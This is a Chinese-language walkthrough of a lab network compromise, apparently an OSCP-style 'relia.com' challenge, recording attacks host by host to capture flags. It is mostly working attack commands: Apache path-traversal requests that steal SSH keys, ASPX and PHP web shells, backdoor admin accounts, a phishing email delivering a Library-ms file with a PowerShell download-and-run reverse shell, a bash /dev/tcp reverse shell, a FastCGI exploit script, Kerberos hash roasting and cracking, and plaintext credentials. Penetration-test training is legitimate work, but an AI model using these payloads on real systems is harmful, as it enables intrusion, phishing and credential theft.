一、信息概况

总共 16 台机子

直接访问的 192 网段有 8 台机子

192.168.213.249

192.168.213.248

192.168.213.247

192.168.213.246

192.168.213.245

192.168.213.191

192.168.213.189

192.168.213.250

内网的 172 网段有 8 台机子

172.16.173.6

172.16.173.7

172.16.173.21

172.16.173.19

172.16.173.15

172.16.173.30

172.16.173.14

172.16.173.20

operatingsystem dnshostname ip
--------------- ----------- --

Windows Server 2022 Standard DC02.relia.com 172.16.109.6

Windows Server 2022 Standard MAIL.relia.com 172.16.109.5

Windows Server 2022 Standard login.relia.com 172.16.109.254

Windows 11 Enterprise WK01.relia.com 172.16.109.14

Windows 11 Enterprise WK02.relia.com 172.16.109.15

Windows Server 2022 Standard INTRANET.relia.com 172.16.109.7

Windows Server 2022 Standard FILES.relia.com 172.16.109.21

Windows Server 2022 Standard WEBBY.relia.com 172.16.109.30

二、信息收集

首先扫描所有的 192 网段设备

nmap -Pn 192.168.239.249

nmap -Pn 192.168.213.248

nmap -Pn 192.168.213.247

nmap -Pn 192.168.213.246

nma
p -Pn 192.168.213.245

nmap -Pn 192.168.213.191

nmap -Pn 192.168.213.189

nmap -Pn 192.168.213.250

三、初始进入

192.168.213.245
nmap -Pn 192.168.213.245 -p 21,80,443,2222,8000 -Av

21/tcp open ftp vsftpd 2.0.8 or later

80/tcp open http Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f

mod_wsgi/4.9.4 Python/3.8)

443/tcp open ssl/http Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f

mod_wsgi/4.9.4 Python/3.8)

2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu

Linux; protocol 2.0)

8000/tcp open http Apache httpd 2.4.49 ((Unix) OpenSSL/1.1.1f

mod_wsgi/4.9.4 Python/3.8)

dirsearch web 端口
查看到 Apache httpd 2.4.49 有任意文件读取漏
洞 https://www.exploit-db.com/exploits/50383

curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami"

"http://192.168.239.245:8000/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e
%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/
passwd";
查看 anita 用户的私钥类型

curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami"

"http://192.168.239.245:8000/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e
%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
home/anita/.ssh/authorized_keys"

下载密钥

curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami"

"http://192.168.239.245:8000/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e
%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
home/anita/.ssh/id_ecdsa">id_ecdsa
用密钥登录

ssh2john anita_id_ecdsa > anita_ssh.hash

john --wordlist=/usr/share/wordlists/rockyou.txt anita_ssh.hash

用私钥密码登录，

wget https://raw.githubusercontent.com/The-Z-Labs/linux-exploit-
suggester/refs/heads/master/linux-exploit-suggester.sh

用这个脚本获取可利用提权 CVE，使用 CVE-2021-3156 提权

获取 flag

192.168.X.246

用在 245 上获取的私钥密码登录 246，可以直接登录

ss -anp 发现监听了 127.0.0.1 8000 端口
发现这个目录

查看发现有文件包含漏洞
curl "http://127.0.0.1:8000/backend/index.php?
view=../../../../../../../../../var/lib/php/sessions/sara.php"

获取 flag
192.168.X.248--完成

爆破弱口令

登录网站，修改白名单

上传 aspx 一句话木马

<%@ Page Language="Jscript" validateRequest="false" %><

%Response.Write(eval(Request.Item["w"],"unsafe"));%>
http://192.168.242.248/portals/0/1.aspx

用 AntSword 连接

使用 SigmaPotato 提权

使用 antsword 上传 SigmaPotato.exe

创建用户 sara 并加入管理员组

SigmaPotato.exe "net user sara 1qaz2wsxA /add"

SigmaPotato.exe "net localgroup Administrators sara /add"

AI 写代码

xfreerdp /cert-ignore /u:sara /p:1qaz2wsxA /v:192.168.242.248

/drive:shared,/home/kali/yc

获取 flag
192.168.X.249 LEGACY--完成

1.dirsearch -u http://192.168.206.249:8000/cms -x 403,401,404

选择 Filemanager，上传一个一句话木马

删掉这个文件
用 AntSword 连接

使用 SigmaPotato 提权

使用 antsword 上传 SigmaPotato.exe

创建用户 sara 并加入管理员组

.\SigmaPotato "net user sara 1qaz2wsxA /add"

.\SigmaPotato "net localgroup Administrators sara /add"

AI 写代码
xfreerdp /cert-ignore /u:sara /p:1qaz2wsxA /v:192.168.206.249
/drive:shared,/home/kali/yc

获取 flag
收集信息

diff --git a/htdocs/cms/data/email.conf.bak

b/htdocs/cms/data/email.conf.bak

deleted file mode 100644

index 77e370c..0000000

--- a/htdocs/cms/data/email.conf.bak

+++ /dev/null

@@ -1,5 +0,0 @@

-Email configuration of the CMS

[email protected]:DPuBT9tGCBrTbR

-
-If something breaks contact [email protected] as he is responsible for
the mail server.

-Please don't send any office or executable attachments as they get

filtered out for security reasons.

\ No newline at end of file

172.16.147.14 WK01

通过给 jim 发钓鱼邮件反弹 shell

1.Kali 系统上设置一个 WebDAV 共享

/usr/local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous

--root /home/kali/beyond/webdav/
2.准备 windows 库文件

登录用题目提供的凭据登录 192.168.199.250

打开 Visual Studio，新建文件，保存文件名称为 config.Library-ms，内容如下，其中 url 为 kali 及

WebDAV 的地址

<?xml version="1.0" encoding="UTF-8"?>

<libraryDescription
xmlns="http://schemas.microsoft.com/windows/2009/library">

<name>@windows.storage.dll,-34582</name>
<version>6</version>

<isLibraryPinned>true</isLibraryPinned>

<iconReference>imageres.dll,-1003</iconReference>

<templateInfo>

<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</
folderType>

</templateInfo>

<searchConnectorDescriptionList>

<searchConnectorDescription>

<isDefaultSaveLocation>true</isDefaultSaveLocation>

<isSupported>false</isSupported>

<simpleLocation>

<url>http://192.168.45.250</url>

</simpleLocation>

</searchConnectorDescription>

</searchConnectorDescriptionList>

</libraryDescription>

AI 写代码
3.新建快捷方式

在 kali 的 powercat.ps1 目录下启动 web 服务

在 kali 上用 nc 监听 4444 端口

在连上的 windows 机器上，右键创建快捷方式

powershell.exe -c "IEX(New-Object
System.Net.WebClient).DownloadString('http://192.168.45.250:8000
/powercat.ps1');

powercat -c 192.168.45.250 -p 4444 -e powershell"

AI 写代码
输入命令

完成之后，将 config.Library-ms 库文件和_configuration 快捷方式拷贝到 kali 上。

4.给 jim 发送邮件

邮件内容如下：
Hey Jim!

I checked CMS and discovered that the previously used staging

script still exists in the Git logs. I'll remove it for security reasons.

On an unrelated note, please install the new security features on

your workstation. For this, download the attached file, double-click
on it, and execute the configuration shortcut within. Thanks!

Maildmz

把邮件内容保存成 body.txt

sudo swaks -t [email protected] --from [email protected] --attach

@config.Library-ms --server 192.168.181.189 --body @body.txt --
header "Subject: Staging Script" --suppress-data -ap

[email protected]:DPuBT9tGCBrTbR
5.拿到 flag

6.信息收集

Get-ChildItem -Path C:\ -Include .kdbx -File -Recurse -ErrorAction

SilentlyContinue

把 Database.kdbx 上传到 kali，破解密码

keepass2john Database.kdbx > keepass.hash

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -

r /usr/share/hashcat/rules/rockyou-30000.rule --force
keepPass 的密码是 mercedes1

| 用户名 | 密码 | 标题 |

| ------------- | --------------- | ----------------- |

| dmzadmin | SlimGodhoodMope | LOGIN local admin |

| [email protected] | Castello1! | User Password |

192.168.181.191

1.初始进入

dmzadmin 登录

191 开着 3389，所以用 dmzadmin 直接 rdp 登录

xfreerdp /cert-ignore /u:dmzadmin /p:SlimGodhoodMope

/v:192.168.181.191

2.获取 flag

3.信息收集

添加 jim 为管理员

.\Rubeus.exe asreproast /nowrap

破解 michelle 的密码

[email protected]:2162CDDB642DBC472D28A4DD7F
3C562F$F9B73691BAA38B6C72F29138A64E85F60282ACE453F5880
1D532DDC3E9A77275338E485EEE2DF8B7798409EAEAEFD9426405
C3C5E53F53120B9BA38A517B2349F01856BA532088961F05E8990
61045F1814AB5F916F071454A6CF24C71FB9342AFDE7C8CF6D081
B74ECC080A9E205126E6B3AF93706446E92E5954E428F50172D85
8E7EFFBB06DB27ACFABE266FE2AC04B18846CF50E0F9776AD8311
66F7ACD5611F02B1534C64CA794DC0AE4066859C221D3D68D1EB
7FC20ECED78648B95FC25856A738FC3A7ADDE593E76E7699A161E
DE7AD369EBE6A61A4410E34000A3030892A458F88FA

sudo hashcat -m 18200 hashes.asreproast

/usr/share/wordlists/rockyou.txt -r
/usr/share/hashcat/rules/best64.rule --force

NotMyPassword0k?

查看 michelle 的用户信息
$krb5tgs$23$iis_service$relia.com$http/
[email protected]$5568A9E42045995BACE10D7DD08FB5
90$72C47F452372EAE5A82F612E23EAAE5F71D228AEA279AF02EF
BF67B00F90B54EA62A894F88AFF77FBB7D09E6D6F55570EC36648
AF98C7C15340C55016322A6DC7A904E448271234746786D984559
3583E0B2FB661B9DB685BA8A4F509383F19831257501D853DC211
972EFC7F3DAC6907130875EB8CF83F43ED6B138B162E14F470F5D
988190E265CB6BA5ACF9C2AF90DA66D7E472FE73726FB741F4686
3213AE9A924AA63E2AD432C6E2AEC38F559CEA3F9280BE66EC998
E5F0881A9F75E7729C55765F388EF9A7749E585673E7801539814B
E28BE07C7123C45949F9578840DE208FC4DD518F4600CBFCC7023
DA09F6FFEE22268010495E93FB59C1E6EEB839B2D7DDF642425A7
F448A305CD0AB0A9F3819937353CE9D3F06C7310BC304D75F8A32
A283C902B17ADBDF62D0622D48C090EB7AF1563FA11C9646FF89E
372755CD3E9CA3D0E8667C8CC48D8D3D73BBC5A1F50B664AF624
352FEB82DA75AE50965168659DBDF44BF5546D2ADF38204E4BD6
B924A845496E84E41DE832F3FB764026EFA02E139396662298B744
F85E56E0930787D3E00CB02E40E1EF8E55A022A57E4DCBBC83DCA
0465859DE8F1DA7F37E0C9D6D16BA49868A6EDB671C40CE87E46
3FBE2ECC9E85F3FAEADF7BFCE82E631A1B1B5D5ADBB8FFB397243
1AD538CCD912949C3E6E9811C93C8A7EC2319DF8338FC7379C8FB
23EA5F294E12313D8F99995F8C195B8CEDF83ED94B6E31885DCEC
BC5EBB10928EE184AEF8438E3E765CD36AAD8072A649254323BBE
685ED87508D6A8CCC6C57AF432724BFD168CFE5869C1973F779A0
3DD6F8C7B4E3F0C42C5C803040361B1C4152F2D19B8BC72A4C589
C2BED8C80D240B2777843FFC540854D05D1C047CE4D7F0C643CF
685C6D894CC87ACF6522AC867D66525642F19279C8EDB4BDE011
2495F7CFE4F94A81FB9535810666A43A5A651E2B36671473A0C109
EA310FBF075E438D4E38241FAFA675952402028B99CEFCB0300499
63E1D070633ED439253DEE5C43D0774DC0ADCED317B90B62C803
A7C4D90C37F8D6B8AC6C5CC2AC1CBEB3032CE887DADF39F7D10B
ED55DD5CB47F052FE740463F525409DB8AFA03CF12AF10DE0CC29
F714D111F1D0CE6BE7D2D13313A10036975137F14D15F6E8CA056
1CAB81CBA9970C1F7B594B3D79B6D1D4ED372CA2C4DDABD91CF
1F62C489D96B44C9BD2AC545488A5B85086380CAED80F839646B
A1D96D12B85B432AF73B28914BDA1613715751CDAE9E80948A45
A04FAC5E6A6E3B93986BD4360B58CB1328F8EB81FDB833C676924
1AD78C11E6A86E59B364C64B3C788FADFE46ED70DDAD5378C494
3DC895438F4C16B1BD32C4311CF53F0AD5B931004A13AC36CCD1
60EB720653EA855C4754304BF6A170BC1988BAADBC751BA28B4C
DCF55AD4D1D4323579C67E8340E16807F560AF4DA3A3E7AC78DF
9C719C7EBD8F0DEEA32DF384D403F063A641E5CC40E160FD122EF
6997640C95AAE97F0EF49CCF15EBF17EE0684623EF13E9E0E173

172.16.141.7

1.初始进入

用在 191 上收集的 michelle 用户名密码 NotMyPassword0k?登录

2.获取 flag

提权后获取 administrator 的 flag

3.提权

通过 Apache Httpd 服务提权

apache httpd 的启动账户是 local system

web 根目录 c:\xampp\htdocs 有写权限

写 shell

shell.php

<?php @system($_GET["cmd"]);?>

http://127.0.0.1/shell.php?cmd=net%20localgroup
%20Administrators%20michelle%20/add
然后重新登录

获取 administrator 的 flag

4.信息收集

用 mimikatz 导出用户密码得到 andrea 的密码

Username : andrea

Domain : RELIA

* NTLM : ce3f12443651168b3793f5fbcccff9db

hashcat -m 1000 andrea.ntml /usr/share/wordlists/rockyou.txt -r

/usr/share/hashcat/rules/best64.rule --force
172.16.134.15 WK02

1.初始进入

用在 172.16.141.7 上面收集的用户 andrea 密码 PasswordPassword_6 登录

xfreerdp /cert-ignore /u:dmzadmin /p:SlimGodhoodMope

/v:192.168.210.191

2.提权

在 C 盘下的 schedule.ps1 首行把 andrea 添加到管理员

可以看到这个文件一分钟执行一次

3.获取 flag
4.信息收集

把 Database.kdbx 上传到 kali，破解密码

keepass2john Database.kdbx > keepass.hash

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -

r /usr/share/hashcat/rules/rockyou-30000.rule --force

得到
172.16.98.19 backup

1.初始进入

xfreerdp /cert-ignore /u:dmzadmin /p:SlimGodhoodMope

/v:192.168.210.191

在 191 上做端口转发 2222 转发到本机的 22

172.16.170.19:22

netsh interface portproxy add v4tov4 listenport=2222

listenaddress=192.168.210.191 connectport=22
connectaddress=172.16.170.19
netsh advfirewall firewall add rule name="port_forward_ssh_2222"
protocol=TCP dir=in localip=192.168.210.191 localport=2222
action=allow

用 wk02 获取的 sarah 私钥登录

scp -i sarahprivitekey -P 2222

/home/kali/offsec/Tools/kaliTools/pspy64
[email protected]:/home/sarah
2.获取 flag

3.提权

利用./pspy64 -pf -i 1000|grep borg 得到 borg 的密码

2025/06/07 07:05:18 CMD: UID=0 PID=6099 | /usr/bin/python3

/usr/bin/borg create /opt/borgbackup::usb_1749279918 /media/usb0

2025/06/07 07:05:18 CMD: UID=0 PID=6098 | /bin/sh -c

BORG_PASSPHRASE='xinyVzoH2AnJpRK9sfMgBA' borg create
/opt/borgbackup::usb_1749279918 /media/usb0

sudo /usr/bin/borg extract --stdout /opt/borgbackup::home

sshpass -p "Rb9kNokjDsjYyH" rsync [email protected]:/etc/

/opt/backup/etc/

"user": "amy",

"pass": "0814b6b7f0de51ecf54ca5b6e6e612bf"

得到 amy 的密码是 backups1

切换到 amy，发现 amy 有 sudo 权限

获取 flag

172.16.98.20

1.初始进入

用从 19 上获取的用户名密码登录

sshpass -p "Rb9kNokjDsjYyH" rsync [email protected]:/etc/

/opt/backup/etc/

在 191 上做端口转发 2222 转发到本机的 22

xfreerdp /cert-ignore /u:dmzadmin /p:SlimGodhoodMope

/v:192.168.157.191

netsh interface portproxy add v4tov4 listenport=2222

listenaddress=192.168.157.191 connectport=22
connectaddress=172.16.117.20

netsh advfirewall firewall add rule name="port_forward_ssh_2222"

protocol=TCP dir=in localip=192.168.157.191 localport=2222
action=allow

发现存在本地监听的 9000 端口
2.提权

利用这个脚本来反弹 shell

bash -c 'bash -i >&/dev/tcp/172.16.117.20/9999 0>&1'进行 base64 编码

YmFzaCAtYyAnYmFzaCAtaSA+Ji9kZXYvdGNwLzE3Mi4xNi4xMTcuMjAv
OTk5OSAwPiYxJw==

#!/bin/bash

PAYLOAD="<?php echo
'<!--';system(base64_decode('YmFzaCAtYyAnYmFzaCAtaSA+Ji9kZXY
vdGNwLzE3Mi4xNi4xMTcuMjAvOTk5OSAwPiYxJw==')); echo '-->';"

FILENAMES="/usr/local/www/apache24/data/info.php" # Exisiting file

path

HOST=$1

B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
 OUTPUT=$(mktemp)

env -i \

PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\
n'"auto_prepend_file='data://text/plain\;base64,$B64'" \

SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN
REQUEST_METHOD=POST \

cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT

done

由于 20 的这台 linux 上没有 base64，所以在进行一下 ssh 本地端口转发，把 9000 端口转发出来

ssh -N -L 0.0.0.0:9000:127.0.0.1:9000 [email protected] -p

2222

3.获取 flag
4.信息收集
sshpass -p "DRtajyCwcbWvH/9" ssh [email protected]

172.16.117.21 FILES

1.初始进入

用从 20 上获取的用户名密码登录

sshpass -p "DRtajyCwcbWvH/9" ssh [email protected]

netsh interface portproxy add v4tov4 listenport=2222

listenaddress=192.168.157.191 connectport=5985
connectaddress=172.16.117.21
netsh advfirewall firewall add rule name="port_forward_ssh_2222"
protocol=TCP dir=in localip=192.168.157.191 localport=5985
action=allow

直接在 191 上 smb 访问 21

得到 ConvertTo-SecureString "vau!XCKjNQBv2$" -AsPlaintext -RELIA\

Administrator", $spass)
2.提权

3.获取 flag

172.16.173.6DC02

1.初始进入

用从 172.16.117.21 FILES 上获取的 RELIA\Administrator "vau!XCKjNQBv2$"

登录
2.获取 flag

172.16.173.30WEBBY

1.初始进入

用从 172.16.117.21 FILES 上获取的 RELIA\Administrator "vau!XCKjNQBv2$"

登录

2.获取 flag
172.16.109.5 mail

1.初始进入

用从 172.16.117.21 FILES 上获取的 RELIA\Administrator "vau!XCKjNQBv2$"

登录

2.获取 flag